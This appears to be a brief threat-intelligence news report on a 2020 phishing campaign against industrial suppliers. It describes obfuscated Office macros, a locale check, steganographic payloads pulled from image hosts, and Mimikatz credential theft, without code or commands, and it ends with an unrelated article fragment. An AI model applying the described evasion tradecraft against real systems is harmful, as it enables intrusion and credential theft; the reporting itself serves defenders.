In May 2020, international equipment suppliers for the industrial sector were targeted with an attack that used unconventional techniques to evade detection, according to researchers at Kaspersky. The attacks started with an urgent phishing email being sent to victims which included malicious Microsoft Office documents with obfuscated macros. Targets were located in Germany, the UK, Italy, and Japan. If the localization of the intended victim’s operating system did not match the language used in the phishing email, the malware would not fully execute. The macros execute a PowerShell script which selects a URL that goes to the legitimate public image hosting services imgur[dot]com or imgbox[dot]com to download an image that is hiding encrypted data through the use of steganography. The decryption key for the data is hidden in an exception message associated with an error that was entered into the script on purpose. A second PowerShell script will run a third PowerShell script which is an obfuscated sample of Trojan-PSW.PowerShell.Mimikatz malware. Attackers are using the Mimikatz utility to steal the authentication data of Windows accounts stored on the victim’s computer system. After an infection is successful, the attackers could use this foothold in the supplier’s network as a pivot point later to attack the supplier’s industrial enterprise clients.
By Anthony Zampino Introduction Leading up to the most recent Russian invasion of Ukraine in